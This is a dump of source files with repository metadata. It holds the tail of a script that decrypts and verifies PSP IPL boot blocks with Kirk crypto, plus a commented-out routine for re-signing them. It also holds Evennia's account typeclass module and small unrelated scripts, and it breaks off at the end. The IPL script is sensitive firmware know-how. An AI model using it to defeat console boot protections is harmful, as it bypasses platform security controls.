data_mac = cmac.digest()
# encrypt the aes key and package mac
block = self.k1_enc.encrypt(key + cmac_key) + header_mac + data_mac + b'\x00'*0x20 + block
# verify our signatures are valid
self.__verify_cmac(cmac_key, block, len(data), len(salt))
return block
def __verify_ecdsa(self, block, size, offset):
self.vk.verify(block[0x10:0x10+0x28], block[0x60:0x60+0x30])
self.vk.verify(block[0x38:0x38+0x28], block[0x60:0x60+0x30+size+offset])
def __verify_cmac(self, key, block, size, offset):
cobj = CMAC.new(key, ciphermod=AES)
cobj.update(block[0x60:0x60+0x30])
cobj.verify(block[0x20:0x30])
cobj = CMAC.new(key, ciphermod=AES)
cobj.update(block[0x60:0x90+size+offset])
cobj.verify(block[0x30:0x40])
def print_usage():
print('usage: {} [ipl] [img]'.format(sys.argv[0]))
if len(sys.argv) != 3:
print_usage()
sys.exit(1)
data = open(sys.argv[1], 'rb').read()
out = open(sys.argv[2], 'wb')
BASE = 0x04000000
memory = b'\x00'*(2*1024*1024)
blocks = [data[x:x+0x1000] for x in range(0, len(data), 0x1000)]
lowest_addr = BASE + len(memory)
highest_addr = BASE
prev_blk_sum = 0
for block in blocks:
k1 = Kirk1()
blk = k1.decrypt(block)
load_addr, size, entry, csum = struct.unpack('<IIII', blk[:0x10])
addr_offset = load_addr - BASE
# check hash
hash = SHA1.new(blk[8:0x10+size] + blk[:8]).digest()
hash_dec = kirk7(block[-0x20:], 0x6C)[:0x14]
print(f'hash calculated: {hash.hex()}')
print(f'hash decrypted : {hash_dec.hex()}')
assert hash == hash_dec
assert prev_blk_sum == csum
# verify that the checksum matches
prev_blk_sum = 0
for i in range(0, size, 4):
prev_blk_sum += struct.unpack('<I', blk[0x10+i:0x10+i+4])[0]
prev_blk_sum &= 0xFFFFFFFF
print(f'addr: {load_addr:08X}, size: {size:08X}, entry: {entry:08X}, csum: {csum:08X}')
print(f'got checksum: {prev_blk_sum:08X}')
memory = memory[:addr_offset] + blk[0x10:0x10+size] + memory[addr_offset+size:]
if load_addr < lowest_addr:
lowest_addr = load_addr
if load_addr + size > highest_addr:
highest_addr = load_addr + size
if entry:
break
print(f'load at: {lowest_addr:X}')
decrypted_img = memory[lowest_addr-BASE:highest_addr-BASE]
out.write(decrypted_img)
# an IPL is MAX 0x1000 bytes per blocks, including any necessary headers
# assuming we eventually exceed that size we need to create multiple
# blocks
remaining_size = len(data)
# checksum = 0
# seek = 0
# while remaining_size > 0:
# # 0xC0 is 0x90 for kirk header + 0x10 IPL header + 0x20 hash
# block_size = (0x1000 - 0xC0) if remaining_size > (0x1000 - 0xC0) else remaining_size
# remaining_size = remaining_size - block_size
# entry = 0 if remaining_size > 0 else (load_address | 0x00000000)
# block = struct.pack('<IIII', load_address + seek, block_size, entry, checksum) + data[seek:seek+block_size]
# # calculate SHA1 hash
# block_hash = SHA1.new(block[8:] + block[:8]).digest() + b'\x00'*12
# assert len(block_hash) == 0x20
# if block_size % 0x10 != 0:
# diff = 0x10 - (block_size % 0x10)
# block += b"\x00"*diff
# block_size += diff
# checksum = 0
# for i in range(0, block_size, 4):
# checksum += struct.unpack('<I', block[0x10+i:0x10+i+4])[0]
# checksum &= 0xFFFFFFFF
# kirk1 = Kirk1()
# block = kirk1.encrypt(block, ecdsa=True)
# kirk1.decrypt(block)
# if (len(block) != 0xFE0):
# block += b'\x00'*(0xFE0-len(block))
# out.write(block + kirk4(block_hash, 0x6C))
# seek = seek + block_size
| [
"git@davee.pro"
] | git@davee.pro |
7a1b250d70836eea4d41151baba4c99d37dad85c | 5d8cecc379bb828694662c865930be8c75d26943 | /evennia/accounts/accounts.py | 626c4a60f3a83d7b5cfa779d6967e68f0be50d6e | [
"BSD-3-Clause"
] | permissive | job/evennia | 714e0f3699875169ce0987e4ebc6b5340bef8cbd | 5aaa0fcfee6082a3a2259a6562c459c5f21fb591 | refs/heads/master | 2021-05-08T23:56:14.348366 | 2018-01-30T17:22:24 | 2018-01-30T17:22:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,062 | py | """
Typeclass for Account objects
Note that this object is primarily intended to
store OOC information, not game info! This
object represents the actual user (not their
character) and has NO actual precence in the
game world (this is handled by the associated
character object, so you should customize that
instead for most things).
"""
import time
from django.conf import settings
from django.utils import timezone
from evennia.typeclasses.models import TypeclassBase
from evennia.accounts.manager import AccountManager
from evennia.accounts.models import AccountDB
from evennia.objects.models import ObjectDB
from evennia.comms.models import ChannelDB
from evennia.commands import cmdhandler
from evennia.utils import logger
from evennia.utils.utils import (lazy_property,
make_iter, to_unicode, is_iter,
variable_from_module)
from evennia.typeclasses.attributes import NickHandler
from evennia.scripts.scripthandler import ScriptHandler
from evennia.commands.cmdsethandler import CmdSetHandler
from django.utils.translation import ugettext as _
from future.utils import with_metaclass
__all__ = ("DefaultAccount",)
_SESSIONS = None
_AT_SEARCH_RESULT = variable_from_module(*settings.SEARCH_AT_RESULT.rsplit('.', 1))
_MULTISESSION_MODE = settings.MULTISESSION_MODE
_MAX_NR_CHARACTERS = settings.MAX_NR_CHARACTERS
_CMDSET_ACCOUNT = settings.CMDSET_ACCOUNT
_CONNECT_CHANNEL = None
class AccountSessionHandler(object):
"""
Manages the session(s) attached to an account.
"""
def __init__(self, account):
"""
Initializes the handler.
Args:
account (Account): The Account on which this handler is defined.
"""
self.account = account
def get(self, sessid=None):
"""
Get the sessions linked to this object.
Args:
sessid (int, optional): Specify a given session by
session id.
Returns:
sessions (list): A list of Session objects. If `sessid`
is given, this is a list with one (or zero) elements.
"""
global _SESSIONS
if not _SESSIONS:
from evennia.server.sessionhandler import SESSIONS as _SESSIONS
if sessid:
return make_iter(_SESSIONS.session_from_account(self.account, sessid))
else:
return _SESSIONS.sessions_from_account(self.account)
def all(self):
"""
Alias to get(), returning all sessions.
Returns:
sessions (list): All sessions.
"""
return self.get()
def count(self):
"""
Get amount of sessions connected.
Returns:
sesslen (int): Number of sessions handled.
"""
return len(self.get())
class DefaultAccount(with_metaclass(TypeclassBase, AccountDB)):
"""
This is the base Typeclass for all Accounts. Accounts represent
the person playing the game and tracks account info, password
etc. They are OOC entities without presence in-game. An Account
can connect to a Character Object in order to "enter" the
game.
Account Typeclass API:
* Available properties (only available on initiated typeclass objects)
- key (string) - name of account
- name (string)- wrapper for user.username
- aliases (list of strings) - aliases to the object. Will be saved to
database as AliasDB entries but returned as strings.
- dbref (int, read-only) - unique #id-number. Also "id" can be used.
- date_created (string) - time stamp of object creation
- permissions (list of strings) - list of permission strings
- user (User, read-only) - django User authorization object
- obj (Object) - game object controlled by account. 'character' can also
be used.
- sessions (list of Sessions) - sessions connected to this account
- is_superuser (bool, read-only) - if the connected user is a superuser
* Handlers
- locks - lock-handler: use locks.add() to add new lock strings
- db - attribute-handler: store/retrieve database attributes on this
self.db.myattr=val, val=self.db.myattr
- ndb - non-persistent attribute handler: same as db but does not
create a database entry when storing data
- scripts - script-handler. Add new scripts to object with scripts.add()
- cmdset - cmdset-handler. Use cmdset.add() to add new cmdsets to object
- nicks - nick-handler. New nicks with nicks.add().
* Helper methods
- msg(text=None, from_obj=None, session=None, options=None, **kwargs)
- execute_cmd(raw_string)
- search(ostring, global_search=False, attribute_name=None,
use_nicks=False, location=None,
ignore_errors=False, account=False)
- is_typeclass(typeclass, exact=False)
- swap_typeclass(new_typeclass, clean_attributes=False, no_default=True)
- access(accessing_obj, access_type='read', default=False, no_superuser_bypass=False)
- check_permstring(permstring)
* Hook methods
basetype_setup()
at_account_creation()
> note that the following hooks are also found on Objects and are
usually handled on the character level:
- at_init()
- at_access()
- at_cmdset_get(**kwargs)
- at_first_login()
- at_post_login(session=None)
- at_disconnect()
- at_message_receive()
- at_message_send()
- at_server_reload()
- at_server_shutdown()
"""
objects = AccountManager()
# properties
@lazy_property
def cmdset(self):
return CmdSetHandler(self, True)
@lazy_property
def scripts(self):
return ScriptHandler(self)
@lazy_property
def nicks(self):
return NickHandler(self)
@lazy_property
def sessions(self):
return AccountSessionHandler(self)
# session-related methods
def disconnect_session_from_account(self, session, reason=None):
"""
Access method for disconnecting a given session from the
account (connection happens automatically in the
sessionhandler)
Args:
session (Session): Session to disconnect.
reason (str, optional): Eventual reason for the disconnect.
"""
global _SESSIONS
if not _SESSIONS:
from evennia.server.sessionhandler import SESSIONS as _SESSIONS
_SESSIONS.disconnect(session, reason)
# puppeting operations
def puppet_object(self, session, obj):
"""
Use the given session to control (puppet) the given object (usually
a Character type).
Args:
session (Session): session to use for puppeting
obj (Object): the object to start puppeting
Raises:
RuntimeError: If puppeting is not possible, the
`exception.msg` will contain the reason.
"""
# safety checks
if not obj:
raise RuntimeError("Object not found")
if not session:
raise RuntimeError("Session not found")
if self.get_puppet(session) == obj:
# already puppeting this object
self.msg("You are already puppeting this object.")
return
if not obj.access(self, 'puppet'):
# no access
self.msg("You don't have permission to puppet '%s'." % obj.key)
return
if obj.account:
# object already puppeted
if obj.account == self:
if obj.sessions.count():
# we may take over another of our sessions
# output messages to the affected sessions
if _MULTISESSION_MODE in (1, 3):
txt1 = "Sharing |c%s|n with another of your sessions."
txt2 = "|c%s|n|G is now shared from another of your sessions.|n"
self.msg(txt1 % obj.name, session=session)
self.msg(txt2 % obj.name, session=obj.sessions.all())
else:
txt1 = "Taking over |c%s|n from another of your sessions."
txt2 = "|c%s|n|R is now acted from another of your sessions.|n"
self.msg(txt1 % obj.name, session=session)
self.msg(txt2 % obj.name, session=obj.sessions.all())
self.unpuppet_object(obj.sessions.get())
elif obj.account.is_connected:
# controlled by another account
self.msg("|c%s|R is already puppeted by another Account." % obj.key)
return
# do the puppeting
if session.puppet:
# cleanly unpuppet eventual previous object puppeted by this session
self.unpuppet_object(session)
# if we get to this point the character is ready to puppet or it
# was left with a lingering account/session reference from an unclean
# server kill or similar
obj.at_pre_puppet(self, session=session)
# do the connection
obj.sessions.add(session)
obj.account = self
session.puid = obj.id
session.puppet = obj
# validate/start persistent scripts on object
obj.scripts.validate()
# re-cache locks to make sure superuser bypass is updated
obj.locks.cache_lock_bypass(obj)
# final hook
obj.at_post_puppet()
def unpuppet_object(self, session):
"""
Disengage control over an object.
Args:
session (Session or list): The session or a list of
sessions to disengage from their puppets.
Raises:
RuntimeError With message about error.
"""
for session in make_iter(session):
obj = session.puppet
if obj:
# do the disconnect, but only if we are the last session to puppet
obj.at_pre_unpuppet()
obj.sessions.remove(session)
if not obj.sessions.count():
del obj.account
obj.at_post_unpuppet(self, session=session)
# Just to be sure we're always clear.
session.puppet = None
session.puid = None
def unpuppet_all(self):
"""
Disconnect all puppets. This is called by server before a
reset/shutdown.
"""
self.unpuppet_object(self.sessions.all())
def get_puppet(self, session):
"""
Get an object puppeted by this session through this account. This is
the main method for retrieving the puppeted object from the
account's end.
Args:
session (Session): Find puppeted object based on this session
Returns:
puppet (Object): The matching puppeted object, if any.
"""
return session.puppet
def get_all_puppets(self):
"""
Get all currently puppeted objects.
Returns:
puppets (list): All puppeted objects currently controlled
by this Account.
"""
return list(set(session.puppet for session in self.sessions.all() if session.puppet))
def __get_single_puppet(self):
"""
This is a legacy convenience link for use with `MULTISESSION_MODE`.
Returns:
puppets (Object or list): Users of `MULTISESSION_MODE` 0 or 1 will
always get the first puppet back. Users of higher `MULTISESSION_MODE`s will
get a list of all puppeted objects.
"""
puppets = self.get_all_puppets()
if _MULTISESSION_MODE in (0, 1):
return puppets and puppets[0] or None
return puppets
character = property(__get_single_puppet)
puppet = property(__get_single_puppet)
# utility methods
def delete(self, *args, **kwargs):
"""
Deletes the account permanently.
Notes:
`*args` and `**kwargs` are passed on to the base delete
mechanism (these are usually not used).
"""
for session in self.sessions.all():
# unpuppeting all objects and disconnecting the user, if any
# sessions remain (should usually be handled from the
# deleting command)
try:
self.unpuppet_object(session)
except RuntimeError:
# no puppet to disconnect from
pass
session.sessionhandler.disconnect(session, reason=_("Account being deleted."))
self.scripts.stop()
self.attributes.clear()
self.nicks.clear()
self.aliases.clear()
super(DefaultAccount, self).delete(*args, **kwargs)
# methods inherited from database model
def msg(self, text=None, from_obj=None, session=None, options=None, **kwargs):
"""
Evennia -> User
This is the main route for sending data back to the user from the
server.
Args:
text (str, optional): text data to send
from_obj (Object or Account or list, optional): Object sending. If given, its
at_msg_send() hook will be called. If iterable, call on all entities.
session (Session or list, optional): Session object or a list of
Sessions to receive this send. If given, overrules the
default send behavior for the current
MULTISESSION_MODE.
options (list): Protocol-specific options. Passed on to the protocol.
Kwargs:
any (dict): All other keywords are passed on to the protocol.
"""
if from_obj:
# call hook
for obj in make_iter(from_obj):
try:
obj.at_msg_send(text=text, to_obj=self, **kwargs)
except Exception:
# this may not be assigned.
logger.log_trace()
try:
if not self.at_msg_receive(text=text, **kwargs):
# abort message to this account
return
except Exception:
# this may not be assigned.
pass
kwargs["options"] = options
# session relay
sessions = make_iter(session) if session else self.sessions.all()
for session in sessions:
session.data_out(text=text, **kwargs)
def execute_cmd(self, raw_string, session=None, **kwargs):
"""
Do something as this account. This method is never called normally,
but only when the account object itself is supposed to execute the
command. It takes account nicks into account, but not nicks of
eventual puppets.
Args:
raw_string (str): Raw command input coming from the command line.
session (Session, optional): The session to be responsible
for the command-send
Kwargs:
kwargs (any): Other keyword arguments will be added to the
found command object instance as variables before it
executes. This is unused by default Evennia but may be
used to set flags and change operating paramaters for
commands at run-time.
"""
raw_string = to_unicode(raw_string)
raw_string = self.nicks.nickreplace(raw_string, categories=("inputline", "channel"), include_account=False)
if not session and _MULTISESSION_MODE in (0, 1):
# for these modes we use the first/only session
sessions = self.sessions.get()
session = sessions[0] if sessions else None
return cmdhandler.cmdhandler(self, raw_string,
callertype="account", session=session, **kwargs)
def search(self, searchdata, return_puppet=False, search_object=False,
typeclass=None, nofound_string=None, multimatch_string=None, use_nicks=True, **kwargs):
"""
This is similar to `DefaultObject.search` but defaults to searching
for Accounts only.
Args:
searchdata (str or int): Search criterion, the Account's
key or dbref to search for.
return_puppet (bool, optional): Instructs the method to
return matches as the object the Account controls rather
than the Account itself (or None) if nothing is puppeted).
search_object (bool, optional): Search for Objects instead of
Accounts. This is used by e.g. the @examine command when
wanting to examine Objects while OOC.
typeclass (Account typeclass, optional): Limit the search
only to this particular typeclass. This can be used to
limit to specific account typeclasses or to limit the search
to a particular Object typeclass if `search_object` is True.
nofound_string (str, optional): A one-time error message
to echo if `searchdata` leads to no matches. If not given,
will fall back to the default handler.
multimatch_string (str, optional): A one-time error
message to echo if `searchdata` leads to multiple matches.
If not given, will fall back to the default handler.
use_nicks (bool, optional): Use account-level nick replacement.
Return:
match (Account, Object or None): A single Account or Object match.
Notes:
Extra keywords are ignored, but are allowed in call in
order to make API more consistent with
objects.objects.DefaultObject.search.
"""
# handle me, self and *me, *self
if isinstance(searchdata, basestring):
# handle wrapping of common terms
if searchdata.lower() in ("me", "*me", "self", "*self",):
return self
if search_object:
matches = ObjectDB.objects.object_search(searchdata, typeclass=typeclass, use_nicks=use_nicks)
else:
searchdata = self.nicks.nickreplace(searchdata, categories=("account", ), include_account=False)
matches = AccountDB.objects.account_search(searchdata, typeclass=typeclass)
matches = _AT_SEARCH_RESULT(matches, self, query=searchdata,
nofound_string=nofound_string,
multimatch_string=multimatch_string)
if matches and return_puppet:
try:
return matches.puppet
except AttributeError:
return None
return matches
def access(self, accessing_obj, access_type='read', default=False, no_superuser_bypass=False, **kwargs):
"""
Determines if another object has permission to access this
object in whatever way.
Args:
accessing_obj (Object): Object trying to access this one.
access_type (str, optional): Type of access sought.
default (bool, optional): What to return if no lock of
access_type was found
no_superuser_bypass (bool, optional): Turn off superuser
lock bypassing. Be careful with this one.
Kwargs:
kwargs (any): Passed to the at_access hook along with the result.
Returns:
result (bool): Result of access check.
"""
result = super(DefaultAccount, self).access(accessing_obj, access_type=access_type,
default=default, no_superuser_bypass=no_superuser_bypass)
self.at_access(result, accessing_obj, access_type, **kwargs)
return result
@property
def idle_time(self):
"""
Returns the idle time of the least idle session in seconds. If
no sessions are connected it returns nothing.
"""
idle = [session.cmd_last_visible for session in self.sessions.all()]
if idle:
return time.time() - float(max(idle))
return None
@property
def connection_time(self):
"""
Returns the maximum connection time of all connected sessions
in seconds. Returns nothing if there are no sessions.
"""
conn = [session.conn_time for session in self.sessions.all()]
if conn:
return time.time() - float(min(conn))
return None
# account hooks
def basetype_setup(self):
"""
This sets up the basic properties for an account. Overload this
with at_account_creation rather than changing this method.
"""
# A basic security setup
lockstring = "examine:perm(Admin);edit:perm(Admin);" \
"delete:perm(Admin);boot:perm(Admin);msg:all();" \
"noidletimeout:perm(Builder) or perm(noidletimeout)"
self.locks.add(lockstring)
# The ooc account cmdset
self.cmdset.add_default(_CMDSET_ACCOUNT, permanent=True)
def at_account_creation(self):
"""
This is called once, the very first time the account is created
(i.e. first time they register with the game). It's a good
place to store attributes all accounts should have, like
configuration values etc.
"""
# set an (empty) attribute holding the characters this account has
lockstring = "attrread:perm(Admins);attredit:perm(Admins);" \
"attrcreate:perm(Admins);"
self.attributes.add("_playable_characters", [], lockstring=lockstring)
self.attributes.add("_saved_protocol_flags", {}, lockstring=lockstring)
def at_init(self):
"""
This is always called whenever this object is initiated --
that is, whenever it its typeclass is cached from memory. This
happens on-demand first time the object is used or activated
in some way after being created but also after each server
restart or reload. In the case of account objects, this usually
happens the moment the account logs in or reconnects after a
reload.
"""
pass
# Note that the hooks below also exist in the character object's
# typeclass. You can often ignore these and rely on the character
# ones instead, unless you are implementing a multi-character game
# and have some things that should be done regardless of which
# character is currently connected to this account.
def at_first_save(self):
"""
This is a generic hook called by Evennia when this object is
saved to the database the very first time. You generally
don't override this method but the hooks called by it.
"""
self.basetype_setup()
self.at_account_creation()
permissions = settings.PERMISSION_ACCOUNT_DEFAULT
if hasattr(self, "_createdict"):
# this will only be set if the utils.create_account
# function was used to create the object.
cdict = self._createdict
if cdict.get("locks"):
self.locks.add(cdict["locks"])
if cdict.get("permissions"):
permissions = cdict["permissions"]
del self._createdict
self.permissions.batch_add(*permissions)
def at_access(self, result, accessing_obj, access_type, **kwargs):
"""
This is triggered after an access-call on this Account has
completed.
Args:
result (bool): The result of the access check.
accessing_obj (any): The object requesting the access
check.
access_type (str): The type of access checked.
Kwargs:
kwargs (any): These are passed on from the access check
and can be used to relay custom instructions from the
check mechanism.
Notes:
This method cannot affect the result of the lock check and
its return value is not used in any way. It can be used
e.g. to customize error messages in a central location or
create other effects based on the access result.
"""
pass
def at_cmdset_get(self, **kwargs):
"""
Called just *before* cmdsets on this account are requested by
the command handler. The cmdsets are available as
`self.cmdset`. If changes need to be done on the fly to the
cmdset before passing them on to the cmdhandler, this is the
place to do it. This is called also if the account currently
have no cmdsets. kwargs are usually not used unless the
cmdset is generated dynamically.
"""
pass
def at_first_login(self, **kwargs):
"""
Called the very first time this account logs into the game.
Note that this is called *before* at_pre_login, so no session
is established and usually no character is yet assigned at
this point. This hook is intended for account-specific setup
like configurations.
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def at_pre_login(self, **kwargs):
"""
Called every time the user logs in, just before the actual
login-state is set.
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def _send_to_connect_channel(self, message):
"""
Helper method for loading and sending to the comm channel
dedicated to connection messages.
Args:
message (str): A message to send to the connect channel.
"""
global _CONNECT_CHANNEL
if not _CONNECT_CHANNEL:
try:
_CONNECT_CHANNEL = ChannelDB.objects.filter(db_key=settings.DEFAULT_CHANNELS[1]["key"])[0]
except Exception:
logger.log_trace()
now = timezone.now()
now = "%02i-%02i-%02i(%02i:%02i)" % (now.year, now.month,
now.day, now.hour, now.minute)
if _CONNECT_CHANNEL:
_CONNECT_CHANNEL.tempmsg("[%s, %s]: %s" % (_CONNECT_CHANNEL.key, now, message))
else:
logger.log_info("[%s]: %s" % (now, message))
def at_post_login(self, session=None, **kwargs):
"""
Called at the end of the login process, just before letting
the account loose.
Args:
session (Session, optional): Session logging in, if any.
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
Notes:
This is called *before* an eventual Character's
`at_post_login` hook. By default it is used to set up
auto-puppeting based on `MULTISESSION_MODE`.
"""
# if we have saved protocol flags on ourselves, load them here.
protocol_flags = self.attributes.get("_saved_protocol_flags", None)
if session and protocol_flags:
session.update_flags(**protocol_flags)
# inform the client that we logged in through an OOB message
if session:
session.msg(logged_in={})
self._send_to_connect_channel("|G%s connected|n" % self.key)
if _MULTISESSION_MODE == 0:
# in this mode we should have only one character available. We
# try to auto-connect to our last conneted object, if any
try:
self.puppet_object(session, self.db._last_puppet)
except RuntimeError:
self.msg("The Character does not exist.")
return
elif _MULTISESSION_MODE == 1:
# in this mode all sessions connect to the same puppet.
try:
self.puppet_object(session, self.db._last_puppet)
except RuntimeError:
self.msg("The Character does not exist.")
return
elif _MULTISESSION_MODE in (2, 3):
# In this mode we by default end up at a character selection
# screen. We execute look on the account.
# we make sure to clean up the _playable_characers list in case
# any was deleted in the interim.
self.db._playable_characters = [char for char in self.db._playable_characters if char]
self.msg(self.at_look(target=self.db._playable_characters,
session=session))
def at_failed_login(self, session, **kwargs):
"""
Called by the login process if a user account is targeted correctly
but provided with an invalid password. By default it does nothing,
but exists to be overriden.
Args:
session (session): Session logging in.
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def at_disconnect(self, reason=None, **kwargs):
"""
Called just before user is disconnected.
Args:
reason (str, optional): The reason given for the disconnect,
(echoed to the connection channel by default).
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
reason = " (%s)" % reason if reason else ""
self._send_to_connect_channel("|R%s disconnected%s|n" % (self.key, reason))
def at_post_disconnect(self, **kwargs):
"""
This is called *after* disconnection is complete. No messages
can be relayed to the account from here. After this call, the
account should not be accessed any more, making this a good
spot for deleting it (in the case of a guest account account,
for example).
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def at_msg_receive(self, text=None, from_obj=None, **kwargs):
"""
This hook is called whenever someone sends a message to this
object using the `msg` method.
Note that from_obj may be None if the sender did not include
itself as an argument to the obj.msg() call - so you have to
check for this. .
Consider this a pre-processing method before msg is passed on
to the user session. If this method returns False, the msg
will not be passed on.
Args:
text (str, optional): The message received.
from_obj (any, optional): The object sending the message.
Kwargs:
This includes any keywords sent to the `msg` method.
Returns:
receive (bool): If this message should be received.
Notes:
If this method returns False, the `msg` operation
will abort without sending the message.
"""
return True
def at_msg_send(self, text=None, to_obj=None, **kwargs):
"""
This is a hook that is called when *this* object sends a
message to another object with `obj.msg(text, to_obj=obj)`.
Args:
text (str, optional): Text to send.
to_obj (any, optional): The object to send to.
Kwargs:
Keywords passed from msg()
Notes:
Since this method is executed by `from_obj`, if no `from_obj`
was passed to `DefaultCharacter.msg` this hook will never
get called.
"""
pass
def at_server_reload(self):
"""
This hook is called whenever the server is shutting down for
restart/reboot. If you want to, for example, save
non-persistent properties across a restart, this is the place
to do it.
"""
pass
def at_server_shutdown(self):
"""
This hook is called whenever the server is shutting down fully
(i.e. not for a restart).
"""
pass
def at_look(self, target=None, session=None, **kwargs):
"""
Called when this object executes a look. It allows to customize
just what this means.
Args:
target (Object or list, optional): An object or a list
objects to inspect.
session (Session, optional): The session doing this look.
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
Returns:
look_string (str): A prepared look string, ready to send
off to any recipient (usually to ourselves)
"""
if target and not is_iter(target):
# single target - just show it
return target.return_appearance(self)
else:
# list of targets - make list to disconnect from db
characters = list(tar for tar in target if tar) if target else []
sessions = self.sessions.all()
is_su = self.is_superuser
# text shown when looking in the ooc area
result = ["Account |g%s|n (you are Out-of-Character)" % self.key]
nsess = len(sessions)
result.append(nsess == 1 and "\n\n|wConnected session:|n" or "\n\n|wConnected sessions (%i):|n" % nsess)
for isess, sess in enumerate(sessions):
csessid = sess.sessid
addr = "%s (%s)" % (sess.protocol_key, isinstance(sess.address, tuple) and
str(sess.address[0]) or str(sess.address))
result.append("\n %s %s" % (session.sessid == csessid and "|w* %s|n" % (isess + 1) or
" %s" % (isess + 1), addr))
result.append("\n\n |whelp|n - more commands")
result.append("\n |wooc <Text>|n - talk on public channel")
charmax = _MAX_NR_CHARACTERS if _MULTISESSION_MODE > 1 else 1
if is_su or len(characters) < charmax:
if not characters:
result.append("\n\n You don't have any characters yet. See |whelp @charcreate|n for creating one.")
else:
result.append("\n |w@charcreate <name> [=description]|n - create new character")
result.append("\n |w@chardelete <name>|n - delete a character (cannot be undone!)")
if characters:
string_s_ending = len(characters) > 1 and "s" or ""
result.append("\n |w@ic <character>|n - enter the game (|w@ooc|n to get back here)")
if is_su:
result.append("\n\nAvailable character%s (%i/unlimited):" % (string_s_ending, len(characters)))
else:
result.append("\n\nAvailable character%s%s:"
% (string_s_ending, charmax > 1 and " (%i/%i)" % (len(characters), charmax) or ""))
for char in characters:
csessions = char.sessions.all()
if csessions:
for sess in csessions:
# character is already puppeted
sid = sess in sessions and sessions.index(sess) + 1
if sess and sid:
result.append("\n - |G%s|n [%s] (played by you in session %i)"
% (char.key, ", ".join(char.permissions.all()), sid))
else:
result.append("\n - |R%s|n [%s] (played by someone else)"
% (char.key, ", ".join(char.permissions.all())))
else:
# character is "free to puppet"
result.append("\n - %s [%s]" % (char.key, ", ".join(char.permissions.all())))
look_string = ("-" * 68) + "\n" + "".join(result) + "\n" + ("-" * 68)
return look_string
class DefaultGuest(DefaultAccount):
"""
This class is used for guest logins. Unlike Accounts, Guests and
their characters are deleted after disconnection.
"""
def at_post_login(self, session=None, **kwargs):
"""
In theory, guests only have one character regardless of which
MULTISESSION_MODE we're in. They don't get a choice.
Args:
session (Session, optional): Session connecting.
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
self._send_to_connect_channel("|G%s connected|n" % self.key)
self.puppet_object(session, self.db._last_puppet)
def at_server_shutdown(self):
"""
We repeat the functionality of `at_disconnect()` here just to
be on the safe side.
"""
super(DefaultGuest, self).at_server_shutdown()
characters = self.db._playable_characters
for character in characters:
if character:
print "deleting Character:", character
character.delete()
def at_post_disconnect(self, **kwargs):
"""
Once having disconnected, destroy the guest's characters and
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
super(DefaultGuest, self).at_post_disconnect()
characters = self.db._playable_characters
for character in characters:
if character:
character.delete()
self.delete()
| [
"griatch@gmail.com"
] | griatch@gmail.com |
b11373667fb38f0359908cf991b2060b7e448e86 | 92ad6aaacc2e2fc215b40455a2999982a0f7f40a | /addno.py | ffdcdb6221a600520186f5ecf2006dbc5b4bd67d | [] | no_license | yashkoli/python-examples | aaa4f5b40749360b13f8777f54ff54d5ba7a8654 | 8cd6f8f96f39d020acdab2006413437bee039cf3 | refs/heads/master | 2021-04-30T12:11:27.430921 | 2018-02-12T16:44:45 | 2018-02-12T16:44:45 | 121,269,597 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | f=open("addno.txt","w")
ch='y'
while ch=='y':
n=input("enter no:")
f.write("\n")
f.write(n)
ch=input("do want contune")
f.close
| [
"noreply@github.com"
] | yashkoli.noreply@github.com |
e98ba7543f9bd03d820dd5971ece16c7d6274084 | daab8631fa9c992a57da364d4fd0084bdab47ad4 | /ex041.py | cf814a482865c1b4b6a4c09385094c69e97e5476 | [
"MIT"
] | permissive | danoliveiradev/PythonExercicios | e784f2f15db61c4cd22691f465e453a84babee11 | e788191e755f54cd3c51ca24a2d3a2ed32923b12 | refs/heads/main | 2023-08-28T22:31:51.587786 | 2021-09-26T14:00:51 | 2021-09-26T14:00:51 | 410,567,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 688 | py | from datetime import date
print('-=-'*20)
print('\033[93mCONFEDERAÇÃO NACIONAL DE NATAÇÃO\033[m')
print('-=-'*20)
anoNasc = int(input('Digite o ano de seu nascimento, com 4 digitos: '))
idade = date.today().year - anoNasc
if idade <= 9:
print('De acordo com a sua idade sua categoria é: \033[32mMIRIM')
elif 9 < idade <= 14:
print('De acordo com a sua idade sua categoria é: \033[34mINFANTIL')
elif 14 < idade <= 19:
print('De acordo com a sua idade sua categoria é: \033[33mJUNIOR')
elif 19 < idade <= 25:
print('De acordo com a sua idade sua categoria é: \033[97mSÊNIOR')
elif idade > 25:
print('De acordo com a sua idade sua categoria é: \033[31mMASTER')
| [
"danielroliveira.dev@gmail.com"
] | danielroliveira.dev@gmail.com |
b7e6f05612f03e546e673dbfb7c26d8bf885158c | 3f14a1a5541e6159e9d8c59d76fb9a96e4d485d5 | /lists/migrations/0002_item_text.py | 36d352e94053bad2b583e9232893e96b622434f1 | [] | no_license | mkwokgithub/django-tdd | 78ae0c1c94540dbe224680a8c9c52a0b5e3555a0 | 11893e56569e0575490ecd6d56c7256c65a7cce6 | refs/heads/master | 2021-05-16T04:23:21.058812 | 2018-01-04T02:13:40 | 2018-01-04T02:13:40 | 105,926,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 429 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-21 18:22
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lists', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='item',
name='text',
field=models.TextField(default=''),
),
]
| [
"mkwok@cisco.com"
] | mkwok@cisco.com |
c7ecf4d39fc5da58cbcc70de44441b852b8e730e | a30b39a642421254be04576a02d55d38b6e52bcd | /achilles/tables/__init__.py | 2539b6dbacdf896634e872bf33cf057c10bd596a | [
"Apache-2.0"
